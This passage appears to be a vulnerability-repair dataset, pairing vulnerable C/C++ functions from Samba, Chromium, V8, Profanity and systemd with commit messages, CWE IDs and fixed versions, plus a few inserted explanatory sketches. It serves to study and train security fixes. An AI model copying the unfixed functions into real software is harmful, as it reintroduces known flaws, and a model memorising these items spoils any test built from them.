Code: static bool ldap_push_filter(struct asn1_data *data, struct ldb_parse_tree *tree) { int i; switch (tree->operation) { case LDB_OP_AND: case LDB_OP_OR: asn1_push_tag(data, ASN1_CONTEXT(tree->operation==LDB_OP_AND?0:1)); for (i=0; i<tree->u.list.num_elements; i++) { if (!ldap_push_filter(data, tree->u.list.elements[i])) { return false; } } asn1_pop_tag(data); break; case LDB_OP_NOT: asn1_push_tag(data, ASN1_CONTEXT(2)); if (!ldap_push_filter(data, tree->u.isnot.child)) { return false; } asn1_pop_tag(data); break; case LDB_OP_EQUALITY: /* equality test */ asn1_push_tag(data, ASN1_CONTEXT(3)); asn1_write_OctetString(data, tree->u.equality.attr, strlen(tree->u.equality.attr)); asn1_write_OctetString(data, tree->u.equality.value.data, tree->u.equality.value.length); asn1_pop_tag(data); break; case LDB_OP_SUBSTRING: /* SubstringFilter ::= SEQUENCE { type AttributeDescription, -- at least one must be present substrings SEQUENCE OF CHOICE { initial [0] LDAPString, any [1] LDAPString, final [2] LDAPString } } */ asn1_push_tag(data, ASN1_CONTEXT(4)); asn1_write_OctetString(data, tree->u.substring.attr, strlen(tree->u.substring.attr)); asn1_push_tag(data, ASN1_SEQUENCE(0)); if (tree->u.substring.chunks && tree->u.substring.chunks[0]) { i = 0; if (!tree->u.substring.start_with_wildcard) { asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(0)); asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i]); asn1_pop_tag(data); i++; } while (tree->u.substring.chunks[i]) { int ctx; if (( ! tree->u.substring.chunks[i + 1]) && (tree->u.substring.end_with_wildcard == 0)) { ctx = 2; } else { ctx = 1; } asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(ctx)); asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i]); asn1_pop_tag(data); i++; } } asn1_pop_tag(data); asn1_pop_tag(data); break; case LDB_OP_GREATER: /* greaterOrEqual test */ asn1_push_tag(data, ASN1_CONTEXT(5)); asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr)); asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length); asn1_pop_tag(data); break; case LDB_OP_LESS: /* lessOrEqual test */ asn1_push_tag(data, ASN1_CONTEXT(6)); asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr)); asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length); asn1_pop_tag(data); break; case LDB_OP_PRESENT: /* present test */ asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(7)); asn1_write_LDAPString(data, tree->u.present.attr); asn1_pop_tag(data); return !data->has_error; case LDB_OP_APPROX: /* approx test */ asn1_push_tag(data, ASN1_CONTEXT(8)); asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr)); asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length); asn1_pop_tag(data); break; case LDB_OP_EXTENDED: /* MatchingRuleAssertion ::= SEQUENCE { matchingRule [1] MatchingRuleID OPTIONAL, type [2] AttributeDescription OPTIONAL, matchValue [3] AssertionValue, dnAttributes [4] BOOLEAN DEFAULT FALSE } */ asn1_push_tag(data, ASN1_CONTEXT(9)); if (tree->u.extended.rule_id) { asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(1)); asn1_write_LDAPString(data, tree->u.extended.rule_id); asn1_pop_tag(data); } if (tree->u.extended.attr) { asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(2)); asn1_write_LDAPString(data, tree->u.extended.attr); asn1_pop_tag(data); } asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(3)); asn1_write_DATA_BLOB_LDAPString(data, &tree->u.extended.value); asn1_pop_tag(data); 
asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(4)); asn1_write_uint8(data, tree->u.extended.dnAttributes); asn1_pop_tag(data); asn1_pop_tag(data); break; default: return false; } return !data->has_error; } Commit Message: CWE ID: CWE-399
static bool ldap_push_filter(struct asn1_data *data, struct ldb_parse_tree *tree) { int i; switch (tree->operation) { case LDB_OP_AND: case LDB_OP_OR: if (!asn1_push_tag(data, ASN1_CONTEXT(tree->operation==LDB_OP_AND?0:1))) return false; for (i=0; i<tree->u.list.num_elements; i++) { if (!ldap_push_filter(data, tree->u.list.elements[i])) { return false; } } if (!asn1_pop_tag(data)) return false; break; case LDB_OP_NOT: if (!asn1_push_tag(data, ASN1_CONTEXT(2))) return false; if (!ldap_push_filter(data, tree->u.isnot.child)) { return false; } if (!asn1_pop_tag(data)) return false; break; case LDB_OP_EQUALITY: /* equality test */ if (!asn1_push_tag(data, ASN1_CONTEXT(3))) return false; if (!asn1_write_OctetString(data, tree->u.equality.attr, strlen(tree->u.equality.attr))) return false; if (!asn1_write_OctetString(data, tree->u.equality.value.data, tree->u.equality.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_SUBSTRING: /* SubstringFilter ::= SEQUENCE { type AttributeDescription, -- at least one must be present substrings SEQUENCE OF CHOICE { initial [0] LDAPString, any [1] LDAPString, final [2] LDAPString } } */ if (!asn1_push_tag(data, ASN1_CONTEXT(4))) return false; if (!asn1_write_OctetString(data, tree->u.substring.attr, strlen(tree->u.substring.attr))) return false; if (!asn1_push_tag(data, ASN1_SEQUENCE(0))) return false; if (tree->u.substring.chunks && tree->u.substring.chunks[0]) { i = 0; if (!tree->u.substring.start_with_wildcard) { if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(0))) return false; if (!asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i])) return false; if (!asn1_pop_tag(data)) return false; i++; } while (tree->u.substring.chunks[i]) { int ctx; if (( ! tree->u.substring.chunks[i + 1]) && (tree->u.substring.end_with_wildcard == 0)) { ctx = 2; } else { ctx = 1; } if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(ctx))) return false; if (!asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i])) return false; if (!asn1_pop_tag(data)) return false; i++; } } if (!asn1_pop_tag(data)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_GREATER: /* greaterOrEqual test */ if (!asn1_push_tag(data, ASN1_CONTEXT(5))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_LESS: /* lessOrEqual test */ if (!asn1_push_tag(data, ASN1_CONTEXT(6))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_PRESENT: /* present test */ if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(7))) return false; if (!asn1_write_LDAPString(data, tree->u.present.attr)) return false; if (!asn1_pop_tag(data)) return false; return !data->has_error; case LDB_OP_APPROX: /* approx test */ if (!asn1_push_tag(data, ASN1_CONTEXT(8))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr))) return false; if (!asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length)) return false; if (!asn1_pop_tag(data)) return false; break; case LDB_OP_EXTENDED: /* MatchingRuleAssertion ::= SEQUENCE { 
matchingRule [1] MatchingRuleID OPTIONAL, type [2] AttributeDescription OPTIONAL, matchValue [3] AssertionValue, dnAttributes [4] BOOLEAN DEFAULT FALSE } */ if (!asn1_push_tag(data, ASN1_CONTEXT(9))) return false; if (tree->u.extended.rule_id) { if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(1))) return false; if (!asn1_write_LDAPString(data, tree->u.extended.rule_id)) return false; if (!asn1_pop_tag(data)) return false; } if (tree->u.extended.attr) { if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(2))) return false; if (!asn1_write_LDAPString(data, tree->u.extended.attr)) return false; if (!asn1_pop_tag(data)) return false; } if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(3))) return false; if (!asn1_write_DATA_BLOB_LDAPString(data, &tree->u.extended.value)) return false; if (!asn1_pop_tag(data)) return false; if (!asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(4))) return false; if (!asn1_write_uint8(data, tree->u.extended.dnAttributes)) return false; if (!asn1_pop_tag(data)) return false; if (!asn1_pop_tag(data)) return false; break; default: return false; } return !data->has_error; }
164,594
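Every asn1_push_tag/asn1_write_* call in the fixed ldap_push_filter is now wrapped in an early-return check, so a failed or truncated write can no longer be silently ignored. A small sketch of the same pattern with a hypothetical bounded writer:

#include <stdbool.h>
#include <stddef.h>
#include <string.h>

struct buf { char data[64]; size_t used; };

static bool buf_put(struct buf *b, const char *s, size_t n)
{
    if (b->used + n > sizeof(b->data))
        return false;                /* report failure instead of writing anyway */
    memcpy(b->data + b->used, s, n);
    b->used += n;
    return true;
}

static bool build_record(struct buf *b)
{
    /* The first failed write aborts the whole encode, as in the fix above. */
    if (!buf_put(b, "\x30", 1)) return false;
    if (!buf_put(b, "hdr", 3)) return false;
    if (!buf_put(b, "body", 4)) return false;
    return true;
}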
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void PixelBufferRasterWorkerPool::ScheduleMoreTasks() { TRACE_EVENT0("cc", "PixelBufferRasterWorkerPool::ScheduleMoreTasks"); enum RasterTaskType { PREPAINT_TYPE = 0, REQUIRED_FOR_ACTIVATION_TYPE = 1, NUM_TYPES = 2 }; NodeVector tasks[NUM_TYPES]; unsigned priority = 2u; // 0-1 reserved for RasterFinished tasks. TaskGraph graph; size_t bytes_pending_upload = bytes_pending_upload_; bool did_throttle_raster_tasks = false; for (RasterTaskVector::const_iterator it = raster_tasks().begin(); it != raster_tasks().end(); ++it) { internal::RasterWorkerPoolTask* task = it->get(); TaskMap::iterator pixel_buffer_it = pixel_buffer_tasks_.find(task); if (pixel_buffer_it == pixel_buffer_tasks_.end()) continue; if (task->HasFinishedRunning()) { DCHECK(std::find(completed_tasks_.begin(), completed_tasks_.end(), task) != completed_tasks_.end()); continue; } size_t new_bytes_pending_upload = bytes_pending_upload; new_bytes_pending_upload += task->resource()->bytes(); if (new_bytes_pending_upload > max_bytes_pending_upload_) { did_throttle_raster_tasks = true; break; } internal::WorkerPoolTask* pixel_buffer_task = pixel_buffer_it->second.get(); if (pixel_buffer_task && pixel_buffer_task->HasCompleted()) { bytes_pending_upload = new_bytes_pending_upload; continue; } size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); if (scheduled_raster_task_count >= kMaxScheduledRasterTasks) { did_throttle_raster_tasks = true; break; } bytes_pending_upload = new_bytes_pending_upload; RasterTaskType type = IsRasterTaskRequiredForActivation(task) ? REQUIRED_FOR_ACTIVATION_TYPE : PREPAINT_TYPE; if (pixel_buffer_task) { tasks[type].container().push_back( CreateGraphNodeForRasterTask(pixel_buffer_task, task->dependencies(), priority++, &graph)); continue; } resource_provider()->AcquirePixelBuffer(task->resource()->id()); uint8* buffer = resource_provider()->MapPixelBuffer( task->resource()->id()); scoped_refptr<internal::WorkerPoolTask> new_pixel_buffer_task( new PixelBufferWorkerPoolTaskImpl( task, buffer, base::Bind(&PixelBufferRasterWorkerPool::OnRasterTaskCompleted, base::Unretained(this), make_scoped_refptr(task)))); pixel_buffer_tasks_[task] = new_pixel_buffer_task; tasks[type].container().push_back( CreateGraphNodeForRasterTask(new_pixel_buffer_task.get(), task->dependencies(), priority++, &graph)); } scoped_refptr<internal::WorkerPoolTask> new_raster_required_for_activation_finished_task; size_t scheduled_raster_task_required_for_activation_count = tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_required_for_activation_count, tasks_required_for_activation_.size()); if (scheduled_raster_task_required_for_activation_count == tasks_required_for_activation_.size() && should_notify_client_if_no_tasks_required_for_activation_are_pending_) { new_raster_required_for_activation_finished_task = CreateRasterRequiredForActivationFinishedTask(); internal::GraphNode* raster_required_for_activation_finished_node = CreateGraphNodeForTask( new_raster_required_for_activation_finished_task.get(), 0u, // Priority 0 &graph); AddDependenciesToGraphNode( raster_required_for_activation_finished_node, tasks[REQUIRED_FOR_ACTIVATION_TYPE].container()); } scoped_refptr<internal::WorkerPoolTask> new_raster_finished_task; size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_count, PendingRasterTaskCount()); if 
(!did_throttle_raster_tasks && should_notify_client_if_no_tasks_are_pending_) { new_raster_finished_task = CreateRasterFinishedTask(); internal::GraphNode* raster_finished_node = CreateGraphNodeForTask(new_raster_finished_task.get(), 1u, // Priority 1 &graph); for (unsigned type = 0; type < NUM_TYPES; ++type) { AddDependenciesToGraphNode( raster_finished_node, tasks[type].container()); } } SetTaskGraph(&graph); scheduled_raster_task_count_ = scheduled_raster_task_count; set_raster_finished_task(new_raster_finished_task); set_raster_required_for_activation_finished_task( new_raster_required_for_activation_finished_task); } Commit Message: cc: Simplify raster task completion notification logic (Relanding after missing activation bug fixed in https://codereview.chromium.org/131763003/) Previously the pixel buffer raster worker pool used a combination of polling and explicit notifications from the raster worker pool to decide when to tell the client about the completion of 1) all tasks or 2) the subset of tasks required for activation. This patch simplifies the logic by only triggering the notification based on the OnRasterTasksFinished and OnRasterTasksRequiredForActivationFinished calls from the worker pool. BUG=307841,331534 Review URL: https://codereview.chromium.org/99873007 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@243991 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-20
void PixelBufferRasterWorkerPool::ScheduleMoreTasks() { TRACE_EVENT0("cc", "PixelBufferRasterWorkerPool::ScheduleMoreTasks"); enum RasterTaskType { PREPAINT_TYPE = 0, REQUIRED_FOR_ACTIVATION_TYPE = 1, NUM_TYPES = 2 }; NodeVector tasks[NUM_TYPES]; unsigned priority = 2u; // 0-1 reserved for RasterFinished tasks. TaskGraph graph; size_t bytes_pending_upload = bytes_pending_upload_; bool did_throttle_raster_tasks = false; for (RasterTaskVector::const_iterator it = raster_tasks().begin(); it != raster_tasks().end(); ++it) { internal::RasterWorkerPoolTask* task = it->get(); TaskMap::iterator pixel_buffer_it = pixel_buffer_tasks_.find(task); if (pixel_buffer_it == pixel_buffer_tasks_.end()) continue; if (task->HasFinishedRunning()) { DCHECK(std::find(completed_tasks_.begin(), completed_tasks_.end(), task) != completed_tasks_.end()); continue; } size_t new_bytes_pending_upload = bytes_pending_upload; new_bytes_pending_upload += task->resource()->bytes(); if (new_bytes_pending_upload > max_bytes_pending_upload_) { did_throttle_raster_tasks = true; break; } internal::WorkerPoolTask* pixel_buffer_task = pixel_buffer_it->second.get(); if (pixel_buffer_task && pixel_buffer_task->HasCompleted()) { bytes_pending_upload = new_bytes_pending_upload; continue; } size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); if (scheduled_raster_task_count >= kMaxScheduledRasterTasks) { did_throttle_raster_tasks = true; break; } bytes_pending_upload = new_bytes_pending_upload; RasterTaskType type = IsRasterTaskRequiredForActivation(task) ? REQUIRED_FOR_ACTIVATION_TYPE : PREPAINT_TYPE; if (pixel_buffer_task) { tasks[type].container().push_back( CreateGraphNodeForRasterTask(pixel_buffer_task, task->dependencies(), priority++, &graph)); continue; } resource_provider()->AcquirePixelBuffer(task->resource()->id()); uint8* buffer = resource_provider()->MapPixelBuffer( task->resource()->id()); scoped_refptr<internal::WorkerPoolTask> new_pixel_buffer_task( new PixelBufferWorkerPoolTaskImpl( task, buffer, base::Bind(&PixelBufferRasterWorkerPool::OnRasterTaskCompleted, base::Unretained(this), make_scoped_refptr(task)))); pixel_buffer_tasks_[task] = new_pixel_buffer_task; tasks[type].container().push_back( CreateGraphNodeForRasterTask(new_pixel_buffer_task.get(), task->dependencies(), priority++, &graph)); } scoped_refptr<internal::WorkerPoolTask> new_raster_required_for_activation_finished_task; size_t scheduled_raster_task_required_for_activation_count = tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); DCHECK_LE(scheduled_raster_task_required_for_activation_count, tasks_required_for_activation_.size()); if (scheduled_raster_task_required_for_activation_count == tasks_required_for_activation_.size() && should_notify_client_if_no_tasks_required_for_activation_are_pending_) { new_raster_required_for_activation_finished_task = CreateRasterRequiredForActivationFinishedTask(); raster_required_for_activation_finished_task_pending_ = true; internal::GraphNode* raster_required_for_activation_finished_node = CreateGraphNodeForTask( new_raster_required_for_activation_finished_task.get(), 0u, // Priority 0 &graph); AddDependenciesToGraphNode( raster_required_for_activation_finished_node, tasks[REQUIRED_FOR_ACTIVATION_TYPE].container()); } scoped_refptr<internal::WorkerPoolTask> new_raster_finished_task; size_t scheduled_raster_task_count = tasks[PREPAINT_TYPE].container().size() + tasks[REQUIRED_FOR_ACTIVATION_TYPE].container().size(); 
DCHECK_LE(scheduled_raster_task_count, PendingRasterTaskCount()); if (!did_throttle_raster_tasks && should_notify_client_if_no_tasks_are_pending_) { new_raster_finished_task = CreateRasterFinishedTask(); raster_finished_task_pending_ = true; internal::GraphNode* raster_finished_node = CreateGraphNodeForTask(new_raster_finished_task.get(), 1u, // Priority 1 &graph); for (unsigned type = 0; type < NUM_TYPES; ++type) { AddDependenciesToGraphNode( raster_finished_node, tasks[type].container()); } } SetTaskGraph(&graph); scheduled_raster_task_count_ = scheduled_raster_task_count; set_raster_finished_task(new_raster_finished_task); set_raster_required_for_activation_finished_task( new_raster_required_for_activation_finished_task); }
171,263
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static Maybe<int64_t> IndexOfValueImpl(Isolate* isolate, Handle<JSObject> object, Handle<Object> value, uint32_t start_from, uint32_t length) { DCHECK(JSObject::PrototypeHasNoElements(isolate, *object)); Handle<Map> original_map = handle(object->map(), isolate); Handle<FixedArray> parameter_map(FixedArray::cast(object->elements()), isolate); for (uint32_t k = start_from; k < length; ++k) { uint32_t entry = GetEntryForIndexImpl(isolate, *object, *parameter_map, k, ALL_PROPERTIES); if (entry == kMaxUInt32) { continue; } Handle<Object> element_k = Subclass::GetImpl(isolate, *parameter_map, entry); if (element_k->IsAccessorPair()) { LookupIterator it(isolate, object, k, LookupIterator::OWN); DCHECK(it.IsFound()); DCHECK_EQ(it.state(), LookupIterator::ACCESSOR); ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, element_k, Object::GetPropertyWithAccessor(&it), Nothing<int64_t>()); if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } if (object->map() != *original_map) { return IndexOfValueSlowPath(isolate, object, value, k + 1, length); } } else if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } } return Just<int64_t>(-1); } Commit Message: Backport: Fix Object.entries/values with changing elements Bug: 111274046 Test: m -j proxy_resolver_v8_unittest && adb sync && adb shell \ /data/nativetest64/proxy_resolver_v8_unittest/proxy_resolver_v8_unittest Change-Id: I705fc512cc5837e9364ed187559cc75d079aa5cb (cherry picked from commit d8be9a10287afed07705ac8af027d6a46d4def99) CWE ID: CWE-704
static Maybe<int64_t> IndexOfValueImpl(Isolate* isolate, Handle<JSObject> object, Handle<Object> value, uint32_t start_from, uint32_t length) { DCHECK(JSObject::PrototypeHasNoElements(isolate, *object)); Handle<Map> original_map(object->map(), isolate); Handle<FixedArray> parameter_map(FixedArray::cast(object->elements()), isolate); for (uint32_t k = start_from; k < length; ++k) { DCHECK_EQ(object->map(), *original_map); uint32_t entry = GetEntryForIndexImpl(isolate, *object, *parameter_map, k, ALL_PROPERTIES); if (entry == kMaxUInt32) { continue; } Handle<Object> element_k = Subclass::GetImpl(isolate, *parameter_map, entry); if (element_k->IsAccessorPair()) { LookupIterator it(isolate, object, k, LookupIterator::OWN); DCHECK(it.IsFound()); DCHECK_EQ(it.state(), LookupIterator::ACCESSOR); ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, element_k, Object::GetPropertyWithAccessor(&it), Nothing<int64_t>()); if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } if (object->map() != *original_map) { return IndexOfValueSlowPath(isolate, object, value, k + 1, length); } } else if (value->StrictEquals(*element_k)) { return Just<int64_t>(k); } } return Just<int64_t>(-1); }
174,099
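The IndexOfValueImpl fix pins the receiver's original map and re-checks it after every call that can run user JavaScript, switching to a slow path the moment the object's shape changes. The same guard, sketched in C with a hypothetical array type and a version counter standing in for the map comparison:

#include <stddef.h>

struct dyn_array {
    int *items;
    size_t len;
    unsigned version;     /* bumped by any mutation */
};

typedef int (*getter_fn)(struct dyn_array *a, size_t i);   /* may call back into user code */

/* Returns the index of value, -1 if absent, or -2 meaning "restart on a slow path"
 * because the callback mutated the array while we were scanning it. */
static long index_of(struct dyn_array *a, getter_fn get, int value)
{
    unsigned seen = a->version;
    for (size_t i = 0; i < a->len; i++) {
        int v = get(a, i);
        if (a->version != seen)
            return -2;
        if (v == value)
            return (long)i;
    }
    return -1;
}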
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void NetworkHandler::GetCookies(Maybe<Array<String>> protocol_urls, std::unique_ptr<GetCookiesCallback> callback) { if (!host_) { callback->sendFailure(Response::InternalError()); return; } std::vector<GURL> urls = ComputeCookieURLs(host_, protocol_urls); scoped_refptr<CookieRetriever> retriever = new CookieRetriever(std::move(callback)); BrowserThread::PostTask( BrowserThread::IO, FROM_HERE, base::BindOnce( &CookieRetriever::RetrieveCookiesOnIO, retriever, base::Unretained( process_->GetStoragePartition()->GetURLRequestContext()), urls)); } Commit Message: DevTools: speculative fix for crash in NetworkHandler::Disable This keeps BrowserContext* and StoragePartition* instead of RenderProcessHost* in an attemp to resolve UAF of RenderProcessHost upon closure of DevTools front-end. Bug: 801117, 783067, 780694 Change-Id: I6c2cca60cc0c29f0949d189cf918769059f80c1b Reviewed-on: https://chromium-review.googlesource.com/876657 Commit-Queue: Andrey Kosyakov <caseq@chromium.org> Reviewed-by: Dmitry Gozman <dgozman@chromium.org> Cr-Commit-Position: refs/heads/master@{#531157} CWE ID: CWE-20
void NetworkHandler::GetCookies(Maybe<Array<String>> protocol_urls, std::unique_ptr<GetCookiesCallback> callback) { if (!host_) { callback->sendFailure(Response::InternalError()); return; } std::vector<GURL> urls = ComputeCookieURLs(host_, protocol_urls); scoped_refptr<CookieRetriever> retriever = new CookieRetriever(std::move(callback)); BrowserThread::PostTask( BrowserThread::IO, FROM_HERE, base::BindOnce( &CookieRetriever::RetrieveCookiesOnIO, retriever, base::Unretained(storage_partition_->GetURLRequestContext()), urls)); }
172,757
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: InProcessBrowserTest::InProcessBrowserTest() : browser_(NULL), exit_when_last_browser_closes_(true), multi_desktop_test_(false) #if defined(OS_MACOSX) , autorelease_pool_(NULL) #endif // OS_MACOSX { #if defined(OS_MACOSX) base::FilePath chrome_path; CHECK(PathService::Get(base::FILE_EXE, &chrome_path)); chrome_path = chrome_path.DirName(); chrome_path = chrome_path.Append(chrome::kBrowserProcessExecutablePath); CHECK(PathService::Override(base::FILE_EXE, chrome_path)); #endif // defined(OS_MACOSX) CreateTestServer(base::FilePath(FILE_PATH_LITERAL("chrome/test/data"))); base::FilePath src_dir; CHECK(PathService::Get(base::DIR_SOURCE_ROOT, &src_dir)); base::FilePath test_data_dir = src_dir.AppendASCII("chrome/test/data"); embedded_test_server()->ServeFilesFromDirectory(test_data_dir); CHECK(PathService::Override(chrome::DIR_TEST_DATA, test_data_dir)); } Commit Message: Make the policy fetch for first time login blocking The CL makes policy fetching for first time login blocking for all users, except the ones that are known to be non-enterprise users. BUG=334584 Review URL: https://codereview.chromium.org/330843002 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@282925 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-119
InProcessBrowserTest::InProcessBrowserTest() : browser_(NULL), exit_when_last_browser_closes_(true), open_about_blank_on_browser_launch_(true), multi_desktop_test_(false) #if defined(OS_MACOSX) , autorelease_pool_(NULL) #endif // OS_MACOSX { #if defined(OS_MACOSX) base::FilePath chrome_path; CHECK(PathService::Get(base::FILE_EXE, &chrome_path)); chrome_path = chrome_path.DirName(); chrome_path = chrome_path.Append(chrome::kBrowserProcessExecutablePath); CHECK(PathService::Override(base::FILE_EXE, chrome_path)); #endif // defined(OS_MACOSX) CreateTestServer(base::FilePath(FILE_PATH_LITERAL("chrome/test/data"))); base::FilePath src_dir; CHECK(PathService::Get(base::DIR_SOURCE_ROOT, &src_dir)); base::FilePath test_data_dir = src_dir.AppendASCII("chrome/test/data"); embedded_test_server()->ServeFilesFromDirectory(test_data_dir); CHECK(PathService::Override(chrome::DIR_TEST_DATA, test_data_dir)); }
171,151
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: receive_carbon(void **state) { prof_input("/carbons on"); prof_connect(); assert_true(stbbr_received( "<iq id='*' type='set'><enable xmlns='urn:xmpp:carbons:2'/></iq>" )); stbbr_send( "<presence to='stabber@localhost' from='buddy1@localhost/mobile'>" "<priority>10</priority>" "<status>On my mobile</status>" "</presence>" ); assert_true(prof_output_exact("Buddy1 (mobile) is online, \"On my mobile\"")); prof_input("/msg Buddy1"); assert_true(prof_output_exact("unencrypted")); stbbr_send( "<message type='chat' to='stabber@localhost/profanity' from='buddy1@localhost'>" "<received xmlns='urn:xmpp:carbons:2'>" "<forwarded xmlns='urn:xmpp:forward:0'>" "<message id='prof_msg_7' xmlns='jabber:client' type='chat' lang='en' to='stabber@localhost/profanity' from='buddy1@localhost/mobile'>" "<body>test carbon from recipient</body>" "</message>" "</forwarded>" "</received>" "</message>" ); assert_true(prof_output_regex("Buddy1/mobile: .+test carbon from recipient")); } Commit Message: Add carbons from check CWE ID: CWE-346
receive_carbon(void **state) { prof_input("/carbons on"); prof_connect(); assert_true(stbbr_received( "<iq id='*' type='set'><enable xmlns='urn:xmpp:carbons:2'/></iq>" )); stbbr_send( "<presence to='stabber@localhost' from='buddy1@localhost/mobile'>" "<priority>10</priority>" "<status>On my mobile</status>" "</presence>" ); assert_true(prof_output_exact("Buddy1 (mobile) is online, \"On my mobile\"")); prof_input("/msg Buddy1"); assert_true(prof_output_exact("unencrypted")); stbbr_send( "<message type='chat' to='stabber@localhost/profanity' from='stabber@localhost'>" "<received xmlns='urn:xmpp:carbons:2'>" "<forwarded xmlns='urn:xmpp:forward:0'>" "<message id='prof_msg_7' xmlns='jabber:client' type='chat' lang='en' to='stabber@localhost/profanity' from='buddy1@localhost/mobile'>" "<body>test carbon from recipient</body>" "</message>" "</forwarded>" "</received>" "</message>" ); assert_true(prof_output_regex("Buddy1/mobile: .+test carbon from recipient")); }
168,383
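The updated test sends the carbon wrapper from the account's own bare JID (stabber@localhost) because the CWE-346 fix only trusts carbons whose outer 'from' is the user themselves; anything else could be a forged copy injected by another contact. A one-function sketch of that origin check, with hypothetical parameter names:

#include <stdbool.h>
#include <string.h>

/* Accept a carbon only when the wrapper stanza's from equals our bare JID. */
static bool carbon_from_is_self(const char *wrapper_from, const char *my_barejid)
{
    return wrapper_from && my_barejid && strcmp(wrapper_from, my_barejid) == 0;
}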
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: int vt_reset_keyboard(int fd) { int kb; /* If we can't read the default, then default to unicode. It's 2017 after all. */ kb = vt_default_utf8() != 0 ? K_UNICODE : K_XLATE; if (ioctl(fd, KDSKBMODE, kb) < 0) return -errno; return 0; } Commit Message: Merge pull request #12378 from rbalint/vt-kbd-reset-check VT kbd reset check CWE ID: CWE-255
int vt_reset_keyboard(int fd) { int kb, r; /* If we can't read the default, then default to unicode. It's 2017 after all. */ kb = vt_default_utf8() != 0 ? K_UNICODE : K_XLATE; r = vt_verify_kbmode(fd); if (r == -EBUSY) { log_debug_errno(r, "Keyboard is not in XLATE or UNICODE mode, not resetting: %m"); return 0; } else if (r < 0) return r; if (ioctl(fd, KDSKBMODE, kb) < 0) return -errno; return 0; }
169,776
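The fixed vt_reset_keyboard only touches the keyboard after vt_verify_kbmode() confirms it is still in a translated mode, so a raw-mode console (for example one owned by X) is left alone. A hedged sketch of such a check using the standard KDGKBMODE ioctl — the helper name and return convention are assumptions, not systemd's exact code:

#include <errno.h>
#include <sys/ioctl.h>
#include <linux/kd.h>

/* 0 if the VT keyboard is in XLATE/UNICODE (safe to reset),
 * -EBUSY if something switched it to a raw mode, -errno on ioctl failure. */
static int kbmode_is_resettable(int fd)
{
    int mode;

    if (ioctl(fd, KDGKBMODE, &mode) < 0)
        return -errno;
    return (mode == K_XLATE || mode == K_UNICODE) ? 0 : -EBUSY;
}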
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
